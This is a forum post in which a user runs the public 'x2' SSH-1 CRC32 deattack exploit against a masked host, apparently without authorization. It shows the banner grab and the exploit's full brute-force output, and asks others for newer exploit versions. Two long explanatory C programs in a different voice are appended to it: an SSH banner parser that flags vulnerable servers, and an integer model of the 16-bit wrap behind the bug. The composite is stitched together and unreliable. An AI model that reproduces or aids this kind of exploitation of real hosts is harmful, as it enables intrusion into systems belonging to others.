Reaper45

looking for an exploit


I'm sure there are other holes in this host, but I'm curious, since I have never hacked through a front door like SSH, and this is the perfect chance. It looks like a default installation. Xprobe2 says that the host is running Linux kernel 2.2.X. So I telnetted to port 22 and...

fake@fake-desktop:~$ telnet xxx.xxx.xxx.xxx 22
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
SSH-1.5-1.2.25
Protocol mismatch.
Connection closed by foreign host.

Incredible, right? So I ran to milw0rm and downloaded x2.tgz, an exploit made by some guy from team teso, which seems to have disappeared already. I chose target 42, as it seems to be the right one in the targets.txt file.

fake@fake-desktop:~/$ ./x2 -t 42 xxx.xxx.xxx.xxx
SSHD deattack exploit. By Dvorak with Code from teso (http://www.team-teso.net)
Target: MNS quick - SSH-1.5-1.2.25
Attacking: xxx.xxx.xxx.xxx:22
Testing if remote sshd is vulnerable # ATTACH NOW
YES #
Finding h - buf distance (estimate)
(1 ) testing 0x00000004 # SEGV #
(2 ) testing 0x0000c804 # FOUND #
Found buffer, determining exact diff
Finding h - buf distance using the teso method
(3 ) binary-search: h: 0x083fb7fc, slider: 0x00008000 # SURVIVED #
(4 ) binary-search: h: 0x083ff7fc, slider: 0x00004000 # SEGV #
(5 ) binary-search: h: 0x083fd7fc, slider: 0x00002000 # SURVIVED #
(6 ) binary-search: h: 0x083fe7fc, slider: 0x00001000 # SEGV #
(7 ) binary-search: h: 0x083fdffc, slider: 0x00000800 # SEGV #
(8 ) binary-search: h: 0x083fdbfc, slider: 0x00000400 # SURVIVED #
(9 ) binary-search: h: 0x083fddfc, slider: 0x00000200 # SURVIVED #
(10) binary-search: h: 0x083fdefc, slider: 0x00000100 # SEGV #
(11) binary-search: h: 0x083fde7c, slider: 0x00000080 # SURVIVED #
(12) binary-search: h: 0x083fdebc, slider: 0x00000040 # SEGV #
(13) binary-search: h: 0x083fde9c, slider: 0x00000020 # SURVIVED #
(14) binary-search: h: 0x083fdeac, slider: 0x00000010 # SEGV #
(15) binary-search: h: 0x083fdea4, slider: 0x00000008 # SURVIVED #
Bin search done, testing result
Finding exact h - buf distance
(16) trying: 0x083fdea4 # SEGV #
(17) trying: 0x083fdeac # SEGV #
(18) trying: 0x083fdeb4 # SEGV #
(19) trying: 0x083fdebc # SURVIVED #
Exact match found at: 0x00002144
Looking for exact buffer address
Finding exact buffer address
(20) Trying: 0x08072144 # SEGV #
(21) Trying: 0x08073144 # SEGV #
(22) Trying: 0x08074144 # SEGV #
(23) Trying: 0x08075144 # SEGV #
(24) Trying: 0x08076144 # SEGV #
(25) Trying: 0x08077144 # SEGV #
(26) Trying: 0x08078144 # SEGV #
(27) Trying: 0x08079144 # SEGV #
(28) Trying: 0x0807a144 # SEGV #
(29) Trying: 0x0807b144 # SEGV #
(30) Trying: 0x0807c144 # SEGV #
(31) Trying: 0x0807d144 # SEGV #
(32) Trying: 0x0807e144 # SEGV #
(33) Trying: 0x0807f144 # SEGV #
(34) Trying: 0x08080144 # SEGV #
(35) Trying: 0x08081144 # SEGV #
(36) Trying: 0x08082144 # SEGV #
(37) Trying: 0x08083144 # SEGV #
(38) Trying: 0x08084144 # SEGV #
(39) Trying: 0x08085144 # SEGV #
(40) Trying: 0x08086144 # SEGV #
(41) Trying: 0x08087144 # SEGV #
(42) Trying: 0x08088144 # SEGV #
(43) Trying: 0x08089144 # SEGV #
(44) Trying: 0x0808a144 # SEGV #
(45) Trying: 0x0808b144 # SEGV #
(46) Trying: 0x0808c144 # SEGV #
(47) Trying: 0x0808d144 # SEGV #
(48) Trying: 0x0808e144 # SEGV #
(49) Trying: 0x0808f144 # SEGV #
(50) Trying: 0x08090144 # SEGV #
(51) Trying: 0x08091144 # SEGV #
(52) Trying: 0x08092144 # SEGV #
(53) Trying: 0x08093144 # SEGV #
(54) Trying: 0x08094144 # SEGV #
(55) Trying: 0x08095144 # SEGV #
(56) Trying: 0x08096144 # SEGV #
(57) Trying: 0x08097144 # SEGV #
(58) Trying: 0x08098144 # SEGV #
(59) Trying: 0x08099144 # SEGV #
(60) Trying: 0x0809a144 # SEGV #
(61) Trying: 0x0809b144 # SEGV #
(62) Trying: 0x0809c144 # SEGV #
(63) Trying: 0x0809d144 # SEGV #
(64) Trying: 0x0809e144 # SEGV #
(65) Trying: 0x0809f144 # SEGV #
(66) Trying: 0x080a0144 #

From here on the exploit won't stop; it's quite clear the host is vulnerable, but the exploit cannot find the buffer address in memory.

So I wanted to ask you if you had any of the other versions of this exploit. I'm aware that x3.tgz and x4.tgz exist, but I was not able to find them.

Edited by Reaper
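The banner in the post is the first thing worth checking before reaching for any exploit. As an added example (not code from the post, from the x2 exploit, or from any sshd), here is a parser for the SSH identification line "SSH-protoversion-softwareversion [comments]" that splits out the protocol version and software string and answers the two questions that matter here: does the server speak protocol 1 at all (1.3, 1.5 and the 2.0-with-fallback "1.99" all do), and is the software the old ssh.com 1.2.x series. The sample banners fed to it, including the 2.0 and 1.99 ones, are constructed for the example.

```c
/* Added example: SSH identification-string parser. Not part of the
   original post or of any SSH implementation. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdbool.h>

struct ssh_banner {
    int  proto_major;     /* "1" in SSH-1.5-1.2.25 */
    int  proto_minor;     /* "5" */
    char software[64];    /* "1.2.25" */
    char comments[128];   /* optional text after a single space */
};

/* Parse one identification line (with or without CRLF).
   Returns false if the line is not an SSH banner at all. */
bool parse_ssh_banner(const char *line, struct ssh_banner *b)
{
    memset(b, 0, sizeof *b);
    if (strncmp(line, "SSH-", 4) != 0)
        return false;

    const char *p = line + 4;
    char *end;
    long major = strtol(p, &end, 10);
    if (end == p || *end != '.')          /* need "<major>." */
        return false;
    p = end + 1;
    long minor = strtol(p, &end, 10);
    if (end == p || *end != '-')          /* need "<minor>-" */
        return false;
    p = end + 1;

    size_t n = strcspn(p, " \r\n");       /* software runs to space or EOL */
    if (n == 0 || n >= sizeof b->software)
        return false;
    memcpy(b->software, p, n);
    b->software[n] = '\0';
    p += n;

    if (*p == ' ') {                      /* optional comments field */
        p++;
        size_t m = strcspn(p, "\r\n");
        if (m >= sizeof b->comments)
            m = sizeof b->comments - 1;
        memcpy(b->comments, p, m);
        b->comments[m] = '\0';
    }
    b->proto_major = (int)major;
    b->proto_minor = (int)minor;
    return true;
}

/* Protocol 1 is reachable whenever the major version is 1: plain 1.3/1.5
   servers, and 2.0 servers that advertise "1.99" for compatibility. */
bool offers_protocol_1(const struct ssh_banner *b)
{
    return b->proto_major == 1;
}

/* The ssh.com 1.2.x series, which the post's target string names. */
bool is_ssh1_2_series(const struct ssh_banner *b)
{
    return strncmp(b->software, "1.2.", 4) == 0;
}

int main(void)
{
    /* Constructed sample banners; the first is the one from the post. */
    const char *samples[] = {
        "SSH-1.5-1.2.25\r\n",
        "SSH-1.99-OpenSSH_3.9p1\r\n",
        "SSH-2.0-OpenSSH_7.4 Debian\r\n",
        "220 ftp ready\r\n",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct ssh_banner b;
        if (!parse_ssh_banner(samples[i], &b)) {
            printf("not an SSH banner: %s", samples[i]);
            continue;
        }
        printf("proto %d.%d software %s%s%s -> protocol 1: %s, ssh 1.2.x: %s\n",
               b.proto_major, b.proto_minor, b.software,
               b.comments[0] ? " comments " : "", b.comments,
               offers_protocol_1(&b) ? "yes" : "no",
               is_ssh1_2_series(&b) ? "yes" : "no");
    }
    return 0;
}
```

The "Protocol mismatch." line in the post is the server's normal response when what it reads back is not a client identification line of the same "SSH-x.y-name" form; a probe that wants to get past the banner has to send one before the server will continue.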
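The exploit output above spends most of its run measuring the distance between "h" and "buf". As an added illustration (not code from the post, from team teso's x2, or from any real sshd), the block below models the arithmetic behind the bug class it targets, the SSH-1 CRC32 compensation attack detector flaw (the "deattack" bug, CVE-2001-0144), as publicly described: the detector sized its hash table from the packet length, but kept the entry count in a 16-bit variable, so a large enough packet wrapped the count to 0. The table was then allocated with no entries, and the index mask (n - 1) became all ones, so the attacker-chosen value at the head of each 8-byte block was used as the slot unchanged; the exploit's search for the h - buf distance is what turns that into controlled writes. The functions compute integers only and write nothing to memory; the constants are the ones commonly quoted for that code, the MAX_PACKET_LEN ceiling in the hardened version is an assumption of this example, and the fix it mirrors (a 32-bit count plus a bound check) is a simplification, not the real patch.

```c
/* Added illustration of the 16-bit truncation behind the deattack bug.
   Not the real deattack.c and not the exploit's code; integers only. */
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

#define SSH_BLOCKSIZE   8
#define HASH_MINSIZE    8192
#define HASH_ENTRYSIZE  2                 /* one 16-bit index per slot */
#define HASH_FACTOR(x)  ((x) * 3 / 2)
#define MAX_PACKET_LEN  (256u * 1024u)    /* assumed ceiling, hardened version only */

/* Vulnerable sizing: the loop variable l is 32-bit, but the count that is
   kept (and that sizes the allocation) is 16-bit. Returns that count. */
uint16_t vuln_table_entries(uint32_t len)
{
    uint16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;           /* 4096 */
    uint32_t l;
    for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l <<= 2)
        ;
    return (uint16_t)l;                                   /* 65536 wraps to 0 */
}

/* Vulnerable slot selection: with n == 0, n - 1 is -1, the mask is all
   ones, and the attacker-supplied hash is used as the slot unchanged. */
uint32_t vuln_slot(uint32_t hash, uint16_t n)
{
    return hash & (uint32_t)(n - 1);
}

/* Smallest packet length at which the 16-bit count wraps to 0. */
uint32_t first_wrapping_len(void)
{
    for (uint32_t len = 0; len < MAX_PACKET_LEN * 4; len += SSH_BLOCKSIZE)
        if (vuln_table_entries(len) == 0)
            return len;
    return 0;
}

/* Hardened sizing: a 32-bit count plus an explicit bound on the packet
   length; rejects oversize input instead of letting the count wrap. */
bool safe_table_entries(uint32_t len, uint32_t *n_out)
{
    if (len > MAX_PACKET_LEN)
        return false;
    uint32_t l = HASH_MINSIZE / HASH_ENTRYSIZE;
    while (l < HASH_FACTOR(len / SSH_BLOCKSIZE))
        l <<= 2;
    *n_out = l;
    return true;
}

/* Hardened slot selection: refuse a count that is zero or not a power of
   two, so the mask can never reach past the allocated table. */
bool safe_slot(uint32_t hash, uint32_t n, uint32_t *slot)
{
    if (n == 0 || (n & (n - 1)) != 0)
        return false;
    *slot = hash & (n - 1);
    return true;
}

int main(void)
{
    uint32_t len = first_wrapping_len(), n = 0;
    printf("16-bit count wraps to 0 at len=%u bytes (one block earlier: %u entries)\n",
           len, vuln_table_entries(len - SSH_BLOCKSIZE));
    printf("vulnerable slot for hash 0x41424344 with n=0: 0x%08x\n",
           vuln_slot(0x41424344u, 0));
    if (safe_table_entries(len, &n))
        printf("hardened count for the same packet: %u entries\n", n);
    printf("hardened sizing accepts a 300000-byte packet: %s\n",
           safe_table_entries(300000u, &n) ? "yes" : "no");
    return 0;
}
```

The point the numbers make: the count goes 4096, 16384, 65536 as the packet grows, and the third step is exactly the value a 16-bit variable cannot hold, so the first packet large enough to need it (a little under 88 KB with these constants) is the one that zeroes the table size.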